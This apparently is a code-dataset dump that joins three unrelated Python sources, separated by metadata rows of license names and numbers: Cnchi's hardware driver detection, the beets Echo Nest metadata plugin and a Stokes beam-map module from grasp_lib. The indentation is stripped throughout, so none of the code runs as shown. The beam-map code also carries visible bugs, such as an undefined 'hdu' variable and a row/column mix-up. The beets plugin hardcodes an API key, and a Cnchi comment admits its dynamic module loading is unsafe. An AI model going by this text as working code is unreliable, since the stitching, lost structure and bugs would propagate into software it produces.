# (can have more than one object for each device)
self.objects_found = {}
# All objects that are really used
self.objects_used = []
dirs = os.listdir(_HARDWARE_PATH)
# We scan the folder for py files.
# This is unsafe, but we don't care if
# somebody wants Cnchi to run code arbitrarily.
for filename in dirs:
non_valid = ["__init__.py", "hardware.py"]
if filename.endswith(".py") and filename not in non_valid:
filename = filename[:-len(".py")]
name = ""
try:
if __name__ == "__main__":
package = filename
else:
package = "hardware." + filename
name = filename.capitalize()
# This instruction is the same as "from package import name"
class_name = getattr(__import__(package, fromlist=[name]), "CLASS_NAME")
obj = getattr(__import__(package, fromlist=[class_name]), class_name)()
self.all_objects.append(obj)
except ImportError as err:
logging.error("Error importing %s from %s : %s", name, package, err)
except Exception as ex:
logging.error("Unexpected error importing %s", package)
template = "An exception of type {0} occured. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
logging.error(message)
try:
# Detect devices
devices = self.get_devices()
except subprocess.CalledProcessError as err:
txt = "Unable to scan devices, command {0} failed: {1}"
txt = txt.format(err.cmd, err.output.decode())
logging.error(txt)
return
logging.debug(
"Cnchi will test %d drivers for %d hardware devices",
len(self.all_objects),
len(devices))
# Find objects that support the devices we've found.
self.objects_found = {}
for obj in self.all_objects:
for device in devices:
(class_id, vendor_id, product_id) = device
check = obj.check_device(
class_id=class_id,
vendor_id=vendor_id,
product_id=product_id)
if check:
logging.debug(
"Driver %s is needed by (%s, %s, %s)",
obj.class_name, class_id, vendor_id, product_id)
# print("Driver", obj.class_name, "is needed by", class_id, vendor_id, product_id)
if device not in self.objects_found:
self.objects_found[device] = [obj]
else:
self.objects_found[device].append(obj)
self.objects_used = []
for device in self.objects_found:
drivers_available = self.objects_found[device]
objects_selected = []
if len(drivers_available) > 1:
# We have more than one driver for this device!
# We'll need to choose one
# Check if there is a proprietary driver
is_one_closed = False
for driver in drivers_available:
if driver.is_proprietary():
is_one_closed = True
break
for driver in drivers_available:
if not driver.is_graphic_driver():
# For non graphical drivers, we choose the open one as default
if not driver.is_proprietary():
objects_selected.append(driver)
else:
# It's a graphic driver
# We choose the open one if the user does not want to
# use proprietary (or if all the ones available are open)
if not self.use_proprietary_graphic_drivers or not is_one_closed:
# OK, we choose the open one
if not driver.is_proprietary():
objects_selected.append(driver)
else:
# One of them is proprietary and user wants to use it
if driver.is_proprietary():
objects_selected.append(driver)
if len(objects_selected) > 1:
# We still have two or more options,
# let's check their priority
priorities = []
for driver in objects_selected:
priorities.append(driver.get_priority())
for driver in objects_selected:
if driver.get_priority() == max(priorities):
self.objects_used.append(driver)
break
else:
self.objects_used.extend(objects_selected)
else:
# Only one option, add it (it doesn't matter if it's open or not)
self.objects_used.append(drivers_available[0])
@staticmethod
def get_devices():
""" Gets a list of all pci/usb devices """
devices = []
# Get PCI devices
cmd = ["/usr/bin/lspci", "-n"]
lines = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
lines = lines.decode().split("\n")
for line in lines:
if len(line) > 0:
class_id = line.split()[1].rstrip(":")[0:2]
dev = line.split()[2].split(":")
devices.append(("0x" + class_id, "0x" + dev[0], "0x" + dev[1]))
# Get USB devices
cmd = ["/usr/bin/lsusb"]
lines = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
lines = lines.decode().split("\n")
for line in lines:
if len(line) > 0:
dev = line.split()[5].split(":")
devices.append(("0", "0x" + dev[0], "0x" + dev[1]))
return devices
def get_packages(self):
""" Get pacman package list for all detected devices """
packages = []
for obj in self.objects_used:
packages.extend(obj.get_packages())
# Remove duplicates (not necessary but it's cleaner)
packages = list(set(packages))
return packages
def get_conflicts(self):
""" Get all conflicting packages for all detected devices """
packages = []
for obj in self.objects_used:
packages.extend(obj.get_conflicts())
# Remove duplicates (not necessary but it's cleaner)
packages = list(set(packages))
return packages
def get_found_driver_names(self):
""" Returns a list of found driver names """
driver_names = []
for obj in self.objects_used:
driver_names.append(obj.get_name())
return driver_names
def pre_install(self, dest_dir):
""" Run pre install commands for all detected devices """
for obj in self.objects_used:
obj.pre_install(dest_dir)
def post_install(self, dest_dir):
""" Run post install commands for all detected devices """
for obj in self.objects_used:
obj.post_install(dest_dir)
def test():
""" Test module function """
def _(text):
""" Helper function """
return text
hardware_install = HardwareInstall(use_proprietary_graphic_drivers=False)
# hardware_install = HardwareInstall(use_proprietary_graphic_drivers=True)
hardware_pkgs = hardware_install.get_packages()
print(hardware_install.get_found_driver_names())
if len(hardware_pkgs) > 0:
txt = " ".join(hardware_pkgs)
print("Hardware module added these packages :")
print(txt)
if __name__ == "__main__":
test()
|
gpl-3.0
| -156,210,725,189,507,170
| 36.507614
| 102
| 0.546353
| false
| 4.461957
| false
| false
| false
|
andremiller/beets
|
beetsplug/echonest.py
|
1
|
17229
|
# This file is part of beets.
# Copyright 2015, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Fetch a variety of acoustic metrics from The Echo Nest.
"""
import time
import socket
import os
import tempfile
from string import Template
import subprocess
from beets import util, config, plugins, ui
from beets.dbcore import types
import pyechonest
import pyechonest.song
import pyechonest.track
# If a request at the EchoNest fails, we want to retry the request RETRIES
# times and wait between retries for RETRY_INTERVAL seconds.
RETRIES = 10
RETRY_INTERVAL = 10
DEVNULL = open(os.devnull, 'wb')
ALLOWED_FORMATS = ('MP3', 'OGG', 'AAC')
UPLOAD_MAX_SIZE = 50 * 1024 * 1024
# FIXME: use avconv?
CONVERT_COMMAND = u'ffmpeg -i $source -y -acodec libvorbis -vn -aq 2 $dest'
TRUNCATE_COMMAND = u'ffmpeg -t 300 -i $source'\
u'-y -acodec libvorbis -vn -aq 2 $dest'
# Maps attribute names from echonest to their field names in beets.
# The attributes are retrieved from a songs `audio_summary`. See:
# http://echonest.github.io/pyechonest/song.html#pyechonest.song.profile
ATTRIBUTES = {
'energy': 'energy',
'liveness': 'liveness',
'speechiness': 'speechiness',
'acousticness': 'acousticness',
'danceability': 'danceability',
'valence': 'valence',
'tempo': 'bpm',
}
# Types for the flexible fields added by `ATTRIBUTES`
FIELD_TYPES = {
'energy': types.FLOAT,
'liveness': types.FLOAT,
'speechiness': types.FLOAT,
'acousticness': types.FLOAT,
'danceability': types.FLOAT,
'valence': types.FLOAT,
}
MUSICAL_SCALE = ['C', 'C#', 'D', 'D#', 'E' 'F',
'F#', 'G', 'G#', 'A', 'A#', 'B']
# We also use echonest_id (song_id) and echonest_fingerprint to speed up
# lookups.
ID_KEY = 'echonest_id'
FINGERPRINT_KEY = 'echonest_fingerprint'
def _splitstrip(string, delim=u','):
"""Split string (at commas by default) and strip whitespace from the
pieces.
"""
return [s.strip() for s in string.split(delim)]
def diff(item1, item2):
"""Score two Item objects according to the Echo Nest numerical
fields.
"""
result = 0.0
for attr in ATTRIBUTES.values():
if attr == 'bpm':
# BPM (tempo) is handled specially to normalize.
continue
try:
result += abs(
float(item1.get(attr, None)) -
float(item2.get(attr, None))
)
except TypeError:
result += 1.0
try:
bpm1 = float(item1.get('bpm', None))
bpm2 = float(item2.get('bpm', None))
result += abs(bpm1 - bpm2) / max(bpm1, bpm2, 1)
except TypeError:
result += 1.0
return result
def similar(lib, src_item, threshold=0.15, fmt='${difference}: ${path}'):
for item in lib.items():
if item.path != src_item.path:
d = diff(item, src_item)
if d < threshold:
s = fmt.replace('${difference}', '{:2.2f}'.format(d))
ui.print_obj(item, lib, s)
class EchonestMetadataPlugin(plugins.BeetsPlugin):
item_types = FIELD_TYPES
def __init__(self):
super(EchonestMetadataPlugin, self).__init__()
self.config.add({
'auto': True,
'apikey': u'NY2KTZHQ0QDSHBAP6',
'upload': True,
'convert': True,
'truncate': True,
})
self.config.add(ATTRIBUTES)
pyechonest.config.ECHO_NEST_API_KEY = \
self.config['apikey'].get(unicode)
if self.config['auto']:
self.import_stages = [self.imported]
def _echofun(self, func, **kwargs):
"""Wrapper for requests to the EchoNest API. Will retry up to
RETRIES times and wait between retries for RETRY_INTERVAL
seconds.
"""
for i in range(RETRIES):
try:
result = func(**kwargs)
except pyechonest.util.EchoNestAPIError as e:
if e.code == 3:
# reached access limit per minute
self._log.debug(u'rate-limited on try {0}; waiting {1} '
u'seconds', i + 1, RETRY_INTERVAL)
time.sleep(RETRY_INTERVAL)
elif e.code == 5:
# specified identifier does not exist
# no use in trying again.
self._log.debug(u'{0}', e)
return None
else:
self._log.error(u'{0}', e.args[0][0])
return None
except (pyechonest.util.EchoNestIOError, socket.error) as e:
self._log.warn(u'IO error: {0}', e)
time.sleep(RETRY_INTERVAL)
except Exception as e:
# there was an error analyzing the track, status: error
self._log.debug(u'{0}', e)
return None
else:
break
else:
# If we exited the loop without breaking, then we used up all
# our allotted retries.
self._log.error(u'request failed repeatedly')
return None
return result
def _pick_song(self, songs, item):
"""Helper method to pick the best matching song from a list of songs
returned by the EchoNest. Compares artist, title and duration. If
the artist and title match and the duration difference is <= 1.0
seconds, it's considered a match.
"""
if not songs:
self._log.debug(u'no songs found')
return
pick = None
min_dist = item.length
for song in songs:
if song.artist_name.lower() == item.artist.lower() \
and song.title.lower() == item.title.lower():
dist = abs(item.length - song.audio_summary['duration'])
if dist < min_dist:
min_dist = dist
pick = song
if min_dist > 2.5:
return None
return pick
def _flatten_song(self, song):
"""Given an Echo Nest song object, return a flat dict containing
attributes we care about. If song is None, return None.
"""
if not song:
return
values = dict(song.audio_summary)
values['id'] = song.id
return values
# "Profile" (ID-based) lookup.
def profile(self, item):
"""Do a lookup on the EchoNest by MusicBrainz ID.
"""
# Use an existing Echo Nest ID.
if ID_KEY in item:
enid = item[ID_KEY]
# Look up the Echo Nest ID based on the MBID.
else:
if not item.mb_trackid:
self._log.debug(u'no ID available')
return
mbid = 'musicbrainz:track:{0}'.format(item.mb_trackid)
track = self._echofun(pyechonest.track.track_from_id,
identifier=mbid)
if not track:
self._log.debug(u'lookup by MBID failed')
return
enid = track.song_id
# Use the Echo Nest ID to look up the song.
songs = self._echofun(pyechonest.song.profile, ids=enid,
buckets=['id:musicbrainz', 'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Search" (metadata-based) lookup.
def search(self, item):
"""Search the item at the EchoNest by artist and title.
"""
songs = self._echofun(pyechonest.song.search, title=item.title,
results=100, artist=item.artist,
buckets=['id:musicbrainz', 'tracks',
'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Analyze" (upload the audio itself) method.
def prepare_upload(self, item):
"""Truncate and convert an item's audio file so it can be
uploaded to echonest.
Return a ``(source, tmp)`` tuple where `source` is the path to
the file to be uploaded and `tmp` is a temporary file to be
deleted after the upload or `None`.
If conversion or truncation fails, return `None`.
"""
source = item.path
tmp = None
if item.format not in ALLOWED_FORMATS:
if self.config['convert']:
tmp = source = self.convert(source)
if not tmp:
return
if os.stat(source).st_size > UPLOAD_MAX_SIZE:
if self.config['truncate']:
source = self.truncate(source)
if tmp is not None:
util.remove(tmp)
tmp = source
else:
return
if source:
return source, tmp
def convert(self, source):
"""Converts an item in an unsupported media format to ogg. Config
pending.
This is stolen from Jakob Schnitzers convert plugin.
"""
fd, dest = tempfile.mkstemp(u'.ogg')
os.close(fd)
self._log.info(u'encoding {0} to {1}',
util.displayable_path(source),
util.displayable_path(dest))
opts = []
for arg in CONVERT_COMMAND.split():
arg = arg.encode('utf-8')
opts.append(Template(arg).substitute(source=source, dest=dest))
# Run the command.
try:
util.command_output(opts)
except (OSError, subprocess.CalledProcessError) as exc:
self._log.debug(u'encode failed: {0}', exc)
util.remove(dest)
return
self._log.info(u'finished encoding {0}', util.displayable_path(source))
return dest
def truncate(self, source):
"""Truncates an item to a size less than UPLOAD_MAX_SIZE."""
fd, dest = tempfile.mkstemp(u'.ogg')
os.close(fd)
self._log.info(u'truncating {0} to {1}',
util.displayable_path(source),
util.displayable_path(dest))
opts = []
for arg in TRUNCATE_COMMAND.split():
arg = arg.encode('utf-8')
opts.append(Template(arg).substitute(source=source, dest=dest))
# Run the command.
try:
util.command_output(opts)
except (OSError, subprocess.CalledProcessError) as exc:
self._log.debug(u'truncate failed: {0}', exc)
util.remove(dest)
return
self._log.info(u'truncate encoding {0}', util.displayable_path(source))
return dest
def analyze(self, item):
"""Upload the item to the EchoNest for analysis. May require to
convert the item to a supported media format.
"""
prepared = self.prepare_upload(item)
if not prepared:
self._log.debug(u'could not prepare file for upload')
return
source, tmp = prepared
self._log.info(u'uploading file, please be patient')
track = self._echofun(pyechonest.track.track_from_filename,
filename=source)
if tmp is not None:
util.remove(tmp)
if not track:
self._log.debug(u'failed to upload file')
return
# Sometimes we have a track but no song. I guess this happens for
# new / unverified songs. We need to "extract" the audio_summary
# from the track object manually. I don't know why the
# pyechonest API handles tracks (merge audio_summary to __dict__)
# and songs (keep audio_summary in an extra attribute)
# differently.
# Maybe a patch for pyechonest could help?
# First get the (limited) metadata from the track in case
# there's no associated song.
from_track = {}
for key in ATTRIBUTES:
try:
from_track[key] = getattr(track, key)
except AttributeError:
pass
from_track['duration'] = track.duration
# Try to look up a song for the full metadata.
try:
song_id = track.song_id
except AttributeError:
return from_track
songs = self._echofun(pyechonest.song.profile,
ids=[song_id], track_ids=[track.id],
buckets=['audio_summary'])
if songs:
pick = self._pick_song(songs, item)
if pick:
return self._flatten_song(pick)
return from_track # Fall back to track metadata.
# Shared top-level logic.
def fetch_song(self, item):
"""Try all methods to get a matching song object from the
EchoNest. If no method succeeds, return None.
"""
# There are four different ways to get a song. Each method is a
# callable that takes the Item as an argument.
methods = [self.profile, self.search]
if self.config['upload']:
methods.append(self.analyze)
# Try each method in turn.
for method in methods:
song = method(item)
if song:
self._log.debug(u'got song through {0}: {1} - {2} [{3}]',
method.__name__,
item.artist,
item.title,
song.get('duration'),
)
return song
def apply_metadata(self, item, values, write=False):
"""Copy the metadata from the dictionary of song information to
the item.
"""
# Update each field.
for k, v in values.iteritems():
if k in ATTRIBUTES:
field = ATTRIBUTES[k]
self._log.debug(u'metadata: {0} = {1}', field, v)
if field == 'bpm':
item[field] = int(v)
else:
item[field] = v
if 'key' in values and 'mode' in values:
key = MUSICAL_SCALE[values['key'] - 1]
if values['mode'] == 0: # Minor key
key += 'm'
item['initial_key'] = key
if 'id' in values:
enid = values['id']
self._log.debug(u'metadata: {0} = {1}', ID_KEY, enid)
item[ID_KEY] = enid
# Write and save.
if write:
item.try_write()
item.store()
# Automatic (on-import) metadata fetching.
def imported(self, session, task):
"""Import pipeline stage.
"""
for item in task.imported_items():
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song)
# Explicit command invocation.
def requires_update(self, item):
"""Check if this item requires an update from the EchoNest (its
data is missing).
"""
for field in ATTRIBUTES.values():
if not item.get(field):
return True
self._log.info(u'no update required')
return False
def commands(self):
fetch_cmd = ui.Subcommand('echonest',
help='Fetch metadata from the EchoNest')
fetch_cmd.parser.add_option(
'-f', '--force', dest='force', action='store_true', default=False,
help='(re-)download information from the EchoNest'
)
def fetch_func(lib, opts, args):
self.config.set_args(opts)
write = config['import']['write'].get(bool)
for item in lib.items(ui.decargs(args)):
self._log.info(u'{0} - {1}', item.artist, item.title)
if self.config['force'] or self.requires_update(item):
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song, write)
fetch_cmd.func = fetch_func
sim_cmd = ui.Subcommand('echosim', help='show related files')
sim_cmd.parser.add_option(
'-t', '--threshold', dest='threshold', action='store',
type='float', default=0.15, help='Set difference threshold'
)
sim_cmd.parser.add_option(
'-f', '--format', action='store', default='${difference}: ${path}',
help='print with custom format'
)
def sim_func(lib, opts, args):
self.config.set_args(opts)
for item in lib.items(ui.decargs(args)):
similar(lib, item, opts.threshold, opts.format)
sim_cmd.func = sim_func
return [fetch_cmd, sim_cmd]
|
mit
| -5,006,644,330,438,449,000
| 33.527054
| 79
| 0.546346
| false
| 4.023587
| true
| false
| false
|
MicheleMaris/grasp_lib
|
stokesCubeMap.py
|
1
|
16416
|
VERSION='V 1.4 - 2014 Jun 4 - '
from grid2d import MapGrid
class stokesCubeMap :
def __init__(self,*Arg) :
arm_alias={'x':'S','y':'M'}
self._nameRIMO=None
self._angularCut=None
self._Nsamples=-1
self.File = []
self.Component = []
self.Instrument = []
self.Channel = []
self.Horn = []
self.Arm = []
self.FreqCode = []
self.Version = []
self.FreqMHz = []
self.Polarization = []
self.Beamdata=[]
self.BeamdataQ=[]
self.BeamdataU=[]
self.BeamdataV=[]
self.header={}
if len(Arg) < 2 :
self._arm=None
self._LstFileName=None
return
self._arm=Arg[0]
self._LstFileName=Arg[1]
for k in open(self._LstFileName,'r') :
kk=k.split('/')[-1].split('.')[0].split('_')
if kk[4]==self._arm :
self.File.append(k.split('.')[0]+'.stokes')
self.Component.append(kk[0])
self.Instrument.append(kk[1])
self.Channel.append(kk[2])
self.Horn.append(kk[3])
self.Arm.append(kk[4])
self.FreqCode.append(kk[5])
self.Version.append(kk[6])
self.FreqMHz.append(float(kk[5][1:]))
self.Polarization.append(arm_alias[kk[4]])
for k in self.keys() : self.__dict__[k]=np.array(self.__dict__[k])
def fill_from_fits(self) :
import numpy as np
self.Beamdata=[]
self.BeamdataQ=[]
self.BeamdataU=[]
self.BeamdataV=[]
self.header={}
isFirst=True
for k in self.File :
print k
p,x,b,q,u,v = self.get_fits(k)
self.Beamdata.append(b)
self.BeamdataQ.append(q)
self.BeamdataU.append(u)
self.BeamdataV.append(v)
if isFirst :
self.header={'p':p,'x':x}
isFirst=False
for k in ['','Q','U','V'] :
nn='Beamdata'+k
self.__dict__[nn]=np.array(self.__dict__[nn]).transpose()
self._Nsamples=self.Beamdata.shape[0]
def fitsType(self) :
if self.header['x'].has_key('HIERARCH Nx') :
return 'grd'
else :
return 'cut'
def getGeometry(self) :
import numpy as np
if self.fitsType()=='grd' :
return
else :
geom={}
for k in ['objType','Ntheta','Nphi','Mintheta','Maxtheta'] :
geom[k]=self.header['x']['HIERARCH '+k]
geom['colat']=np.rad2deg(np.arange(geom['Ntheta'])*(geom['Maxtheta']-geom['Mintheta'])/float(geom['Ntheta']-1)+geom['Mintheta'])
geom['long']=np.arange(geom['Nphi'])/float(geom['Nphi']-1)*360.
return geom
def apply_angularCut(self,angularCut) :
import numpy as np
if self.fitsType()=='grd' : return
if angularCut == None : return
self._angularCut=angularCut
gg=self.getGeometry()
idx=np.where(gg['colat']<self._angularCut)[0].max()
imax=idx*gg['Nphi']+gg['Nphi']
self.Beamdata[:imax,:]=0
self.BeamdataQ[:imax,:]=0
self.BeamdataU[:imax,:]=0
self.BeamdataV[:imax,:]=0
def __len__(self) :
return len(self.FreqMHz)
def __getitem__(self,this) :
return self.__dict__[this]
def keys(self) :
l=[]
for k in self.__dict__.keys() :
if k[0]!='_' : l.append(k)
return l
def copy(self) :
import copy
return copy.deepcopy(self)
def argslice(self,idx) :
out=self.copy()
for k in self.keys() :
out.__dict__[k]=self.__dict__[k][idx]
def get_fits(self,File,ihdu=1,fitsfile=None) :
import pyfits
if fitsfile == None :
t=pyfits.open(File)
else :
t=fitsfile
p=t[0].header
x=t[hdu].header
b=t[hdu].data.field('Beamdata')
q=t[hdu].data.field('BeamdataQ')
u=t[hdu].data.field('BeamdataU')
v=t[hdu].data.field('BeamdataV')
if fitsfile == None :
t.close()
return p,x,b,q,u,v
def _template(self) :
import numpy as np
return self.Beamdata.shape
def isGRD(self) :
"Returns True if the file is a GRD"
return self.header['x'].has_key('HIERARCH Nx')
def Nelements(self) :
return self.header['x']['NAXIS2']
def NrowsNcols(self) :
"returns the number of rows and cols"
if self.isGRD() :
return (self.header['x']['HIERARCH Ny'],self.header['x']['HIERARCH Nx'])
return (self.header['x']['HIERARCH Ntheta'],self.header['x']['HIERARCH Nphi'])
def reshape2d(self) :
"reshape to 2d the matrices"
for k in self.keys() :
self.__dict__[k].shape=self.NrowsNcols()
def reshape1d(self) :
"reshape to 1d the matrices"
for k in self.keys() :
self.__dict__[k].shape=self.__dict__[k].size
def rows_cols_idx(self) :
"returns the maps of rows and cols index"
import numpy as np
nr,nc=self.NrowsNcols()
row=np.zeros([nr,nc])
for k in range(nr) : row[k,:]=k
row.shape=self.Nelements()
col=np.zeros([nr,nc])
for k in range(nc) : row[:,k]=k
col.shape=self.Nelements()
return row,col
def rows_cols_values(self) :
"returns the maps of rows and cols values"
import numpy as np
nr,nc=self.NrowsNcols()
row=np.zeros([nr,nc])
for k in range(nr) : row[k,:]=k
row.shape=self.Nelements()
col=np.zeros([nr,nc])
for k in range(nc) : row[:,k]=k
col.shape=self.Nelements()
return row,col
def interp(self,idx,FreqMHz) :
import numpy as np
b=np.interp(FreqMHz,self.FreqMHz,self.Beamdata[idx])
q=np.interp(FreqMHz,self.FreqMHz,self.BeamdataQ[idx])
u=np.interp(FreqMHz,self.FreqMHz,self.BeamdataU[idx])
v=np.interp(FreqMHz,self.FreqMHz,self.BeamdataV[idx])
return b,q,u,v
def resample(self,FreqMHz) :
import copy
import numpy as np
out=stokesCubeMap()
out.header=self.header
out.FreqMHz=FreqMHz
out._Nsamples=self._Nsamples
out.Beamdata = np.zeros([self._Nsamples,len(out.FreqMHz)])
out.BeamdataQ = np.zeros([self._Nsamples,len(out.FreqMHz)])
out.BeamdataU = np.zeros([self._Nsamples,len(out.FreqMHz)])
out.BeamdataV = np.zeros([self._Nsamples,len(out.FreqMHz)])
for ii in range(self._Nsamples) :
b,q,u,v=self.interp(ii,out.FreqMHz)
out.Beamdata[ii]=b
out.BeamdataQ[ii]=q
out.BeamdataU[ii]=u
out.BeamdataV[ii]=v
return out
def average(self,FreqMHz,Weight,Method=None,nameRIMO=None) :
import numpy as np
import time
import copy
out=stokesCubeMap()
out.File=copy.deepcopy(self.File)
out._angularCut=self._angularCut
out.header=self.header
out.Beamdata = np.zeros([self._Nsamples])
out.BeamdataQ = np.zeros([self._Nsamples])
out.BeamdataU = np.zeros([self._Nsamples])
out.BeamdataV = np.zeros([self._Nsamples])
out._Nsamples=0
dw=(FreqMHz[1:]-FreqMHz[:-1])*0.5
out._Norm=((Weight[1:]+Weight[:-1])*dw).sum()
out._Method=Method
tic=time.time()
for ii in range(self._Nsamples) :
b,q,u,v=self.interp(ii,FreqMHz)
xx=b*Weight ; out.Beamdata[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
xx=q*Weight ; out.BeamdataQ[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
xx=u*Weight ; out.BeamdataU[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
xx=v*Weight ; out.BeamdataV[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
out._elapsed_time=time.time()-tic
out._Method=Method
out._nameRIMO=nameRIMO
return out
def tofits(self,fitsname,Author='M.Maris',creator='',version='',doNotWrite=False,clobber=True) :
"saves the file in fits"
import numpy as np
from collections import OrderedDict
import pyfits
from SmartTable import dict2fits
import time
import copy
#o=pyfits.open(fitsname)
out = OrderedDict()
out['Beamdata']=np.array(self['Beamdata'],dtype='float32')
out['BeamdataQ']=np.array(self['BeamdataQ'],dtype='float32')
out['BeamdataU']=np.array(self['BeamdataU'],dtype='float32')
out['BeamdataV']=np.array(self['BeamdataV'],dtype='float32')
T=dict2fits.Table(out)
#T.header=copy.deepcopy(self.header['x'])
T.header.update('TUNIT1',self.header['x']['TUNIT1'])
T.header.update('TUNIT2',self.header['x']['TUNIT2'])
T.header.update('TUNIT3',self.header['x']['TUNIT3'])
T.header.update('TUNIT4',self.header['x']['TUNIT4'])
#
#test wether the original file was a GRD or a CUT file
print ' copying Header'
if self.header['x'].has_key('HIERARCH Nx') :
# a grd file
for k in ['objType','Nx','Ny','Xcentre','Ycentre','Xdelta','Ydelta'] :
T.header.update('HIERARCH '+k,self.header['x']['HIERARCH '+k])
print " %s : '%s' in '%s'"%(k,self.header['x']['HIERARCH '+k],T.header['HIERARCH '+k])
else :
# a CUT file
for k in ['objType','Ntheta','Nphi','Mintheta','Maxtheta'] :
T.header.update('HIERARCH '+k,self.header['x']['HIERARCH '+k])
print " %s : '%s' in '%s'"%(k,self.header['x']['HIERARCH '+k],T.header['HIERARCH '+k])
print
T.header.update('HIERARCH SUM BEAMDATA',self['Beamdata'].sum(),'sum of Beamdata')
T.header.update('HIERARCH SUM BEAMDATAQ',self['BeamdataQ'].sum(),'sum of BeamdataQ')
T.header.update('HIERARCH SUM BEAMDATAU',self['BeamdataU'].sum(),'sum of BeamdataU')
T.header.update('HIERARCH SUM BEAMDATAV',self['BeamdataV'].sum(),'sum of BeamdataV')
T.header.update('HIERARCH RIMO',self._nameRIMO if self._nameRIMO != None else '','')
T.header.update('HIERARCH ANGULARCUT',self._angularCut if self._angularCut != None else 'None','angular cut [deg]')
T.header.update('HIERARCH DATE',time.asctime(),'')
T.header.update('HIERARCH CREATOR',creator,'')
T.header.update('HIERARCH CONTACT',Author,'')
if self._Method != None :
for k in self._Method :
T.header.update('HIERARCH '+k[0],k[1],k[2])
T.header.add_comment('')
T.header.add_comment('Beam band averaged')
T.header.add_comment('Follows the list of input files used')
for i in range(len(self.File)) :
l='%s'%(self.File[i])
T.header.add_comment(l)
T.header.add_comment('')
if not doNotWrite :
print " Writing to:",fitsname
T.writeto(fitsname,clobber=clobber)
return T
class stokesMap(MapGrid) :
def __init__(self,StokesFileName,mode='readonly') :
from grid2d import GridAxis
self.__new_info__()
self.__info__['fits_readout_time_sec']=-1.
if StokesFileName==None : return
# connects to the fits file
self.fits_connect(StokesFileName,mode=mode)
# gets the header of the first hdu
self.fits_load_hdu(1,justHeader=True)
# formats the mapgrid according to the header content
self.__info__['geometry']=self.getGeometry()
if self.isGRD() :
MapGrid.__init__(self,GridAxis('y','',self.__info__['geometry']['y']),GridAxis('x','',self.__info__['geometry']['x']))
else :
MapGrid.__init__(self,GridAxis('long','deg',self.__info__['geometry']['long']),GridAxis('colat','deg',self.__info__['geometry']['colat']))
# gets the first hdu
self.fits_load_hdu(1)
def __new_info__(self) :
from collections import OrderedDict
self.__info__=OrderedDict()
def fits_info(self) :
"return infos on the fits file"
if self.__info__['fitsfile']==None :
return "File not connected"
return self.__info__['fitsfile'].info()
def fits_primary_header(self) :
"returns the current fits primary header content"
return self.__info__['header']['p']
def fits_extended_header(self) :
"returns the current fits extended header content"
return self.__info__['header']['x']
def fits_connect(self,FileName,mode='readonly') :
"connect (open and keep control) to a fits file"
import pyfits
self.__info__['StokesFileName']=FileName
self.__info__['fitsfile']=pyfits.open(FileName,mode)
self.__info__['ihdu']=-1
self.__info__['header']={'p':None,'x':None}
if self.__info__['fitsfile']==None :
print "Error: file %s not found"%StokesFileName
MapGrid.__init__(self)
return
self.__info__['header']['p']=self.__info__['fitsfile'][0].header
def fits_unconnect(self) :
"unconnect (close and left control) the fits file"
if self.__info__['fitsfile']==None :
print "File not connected"
self.__info__['fitsfile'].close()
self.__info__['fitsfile']=None
def fits_load_hdu(self,ihdu,justHeader=False) :
"""fits_load_hdu(ihdu)
Load a fits hdu ihdu.
If succesfull returns (ihdu, fits_readout_time_sec)"""
from grid2d import GridAxis
import time
self.__info__['fits_readout_time_sec']=-1.
if self.__info__['fitsfile']==None :
print "File not connected"
try :
x=self.__info__['fitsfile'][ihdu].header
except :
print "hdu : ",ihdu," does not exists"
return
self.__info__['header']['x']=x
self.__info__['ihdu']=ihdu
if justHeader : return
tic=time.time()
b=self.__info__['fitsfile'][ihdu].data.field('Beamdata') ; b.shape=(self.R['n'],self.C['n']) ; self.newmap('Beamdata',value=b)
q=self.__info__['fitsfile'][ihdu].data.field('BeamdataQ') ; q.shape=(self.R['n'],self.C['n']) ; self.newmap('BeamdataQ',value=q)
u=self.__info__['fitsfile'][ihdu].data.field('BeamdataU') ; u.shape=(self.R['n'],self.C['n']) ; self.newmap('BeamdataU',value=u)
v=self.__info__['fitsfile'][ihdu].data.field('BeamdataV') ; v.shape=(self.R['n'],self.C['n']) ; self.newmap('BeamdataV',value=v)
self.__info__['fits_readout_time_sec']=time.time()-tic
return self.__info__['ihdu'],self.__info__['fits_readout_time_sec']
def copy(self,skipFields=None,skipFits=True) :
"makes a copy, without fits informations"
import copy
out=stokesMap(None)
for k in self.__dict__.keys() :
if k !='__info__' :
out.__dict__[k]=copy.deepcopy(self.__dict__[k])
else :
out.__new_info__()
for k1 in self.__dict__[k].keys() :
if (k1+' ')[0:4].lower()!='fits' :
out.__dict__[k][k1]=copy.deepcopy(self.__dict__[k][k1])
return out
def fitsType(self) :
if self.__info__['header']['x'].has_key('HIERARCH Nx') :
return 'grd'
else :
return 'cut'
def isGRD(self) :
"Returns True if the file is a GRD"
return self.__info__['header']['x'].has_key('HIERARCH Nx')
def getGeometry(self) :
import numpy as np
geom={}
if self.fitsType()=='grd' :
for k in ['objType','Nx','Ny','Xcentre','Ycentre','Xdelta','Ydelta'] :
geom[k]=self.__info__['header']['x']['HIERARCH '+k]
geom['x']=(np.arange(geom['Nx'])-geom['Xcentre'])*geom['Xdelta']
geom['y']=(np.arange(geom['Ny'])-geom['Ycentre'])*geom['Ydelta']
else :
for k in ['objType','Ntheta','Nphi','Mintheta','Maxtheta'] :
geom[k]=self.__info__['header']['x']['HIERARCH '+k]
geom['colat']=np.rad2deg(np.arange(geom['Ntheta'])*(geom['Maxtheta']-geom['Mintheta'])/float(geom['Ntheta']-1)+geom['Mintheta'])
geom['long']=np.arange(geom['Nphi'])/float(geom['Nphi']-1)*360.
return geom
def coadd(self,that) :
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
self[k]+=that[k]
def scale(self,that) :
